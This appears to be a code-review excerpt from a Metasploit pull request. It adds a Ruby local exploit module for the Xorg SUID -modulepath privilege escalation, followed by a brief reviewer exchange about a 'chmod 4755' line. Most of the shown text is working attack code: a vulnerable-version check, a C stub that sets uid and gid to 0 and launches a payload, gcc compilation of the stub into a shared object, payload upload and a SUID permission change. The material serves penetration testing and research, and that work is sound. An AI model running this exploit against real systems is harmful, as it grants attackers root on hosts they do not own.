modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb

```diff
@@ -0,0 +1,204 @@
+    end
+    vprint_good "Xorg path found at #{xorg_path}"
+    unless setuid? xorg_path
+      vprint_error "Xorg binary #{xorg_path} is not SUID"
+      return CheckCode::Safe
+    end
+    vprint_good "Xorg binary #{xorg_path} is SUID"
+
+    # version check
+    x_version = cmd_exec "Xorg -version"
+    if x_version.include?("Release Date")
+      v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
+      unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
+        vprint_error "Xorg version #{v} not supported"
+        return CheckCode::Safe
+      end
+    elsif x_version.include?("Fatal server error")
+      vprint_error "User probably does not have console auth"
+      vprint_error "Below is Xorg -version output"
+      vprint_error x_version
+      return CheckCode::Safe
+    else
+      vprint_warning "Could not parse Xorg -version output"
+      return CheckCode::Appears
+    end
+    vprint_good "Xorg version #{v} is vulnerable"
+
+    # process check for /X
+    proc_list = cmd_exec "ps ax"
+    if proc_list.include?('/X ')
+      vprint_warning('Xorg in process list')
+      return CheckCode::Appears
+    end
+    vprint_good('Xorg does not appear running')
+    return CheckCode::Vulnerable
+  end
+
+
+  def exploit
+
+    check_status = check
+    if check_status == CheckCode::Appears
+      print_warning 'Could not get version or Xorg process possibly running, may fail'
+    elsif check_status ==  CheckCode::Safe
+      fail_with Failure::NotVulnerable, 'Target not vulnerable'
+    end
+
+    unless has_gcc?
+      vprint_error 'gcc is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'gcc is installed'
+
+    if is_root?
+      fail_with Failure::BadConfig, 'This session already has root privileges'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    print_good 'Passed all initial checks for exploit'
+
+    modulepath = datastore['WritableDir']
+    launcher = "#{modulepath}/#{rand_text_alphanumeric 5..10}.c"
+    pscript = "#{modulepath}/.session-#{rand_text_alphanumeric 5..10}"
+    xdisplay = datastore['Xdisplay']
+    sofile = "#{modulepath}/#{datastore['sofile']}"
+
+    stub = %Q^
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+void _init() {
+setgid(0);
+setuid(0);
+system("#{pscript} &");
+  }
+    ^
+    print_status 'Writing launcher'
+    write_file(launcher, stub)
+    register_file_for_cleanup launcher
+
+    print_status 'compiling launcher'
+    output = cmd_exec "gcc -fPIC -shared -o #{sofile} #{launcher} -nostartfiles"
+    chmod sofile
+    register_file_for_cleanup sofile
+
+    # Uploading
+    print_status 'Uploading your payload, this could take a while'
+    if payload.arch.first == 'cmd'
+      write_file(pscript, payload.encoded)
+    else
+      write_file(pscript, generate_payload_exe)
+    end
+    cmd_exec "chmod 4755 #{pscript}"
```

Comment:
It looks like you're doing a `chmod 4755` during normal execution, not as `root`, so why not simply `chmod +x` ? If I've misread, and it makes sense, you'll need to ensure that `datastore['WriteableDir']` is not mounted `nosuid` with `nosuid?(datastore['WritableDir'])`.

Reply:
That had no reason to be in there.  Realized I had forgot to change it back.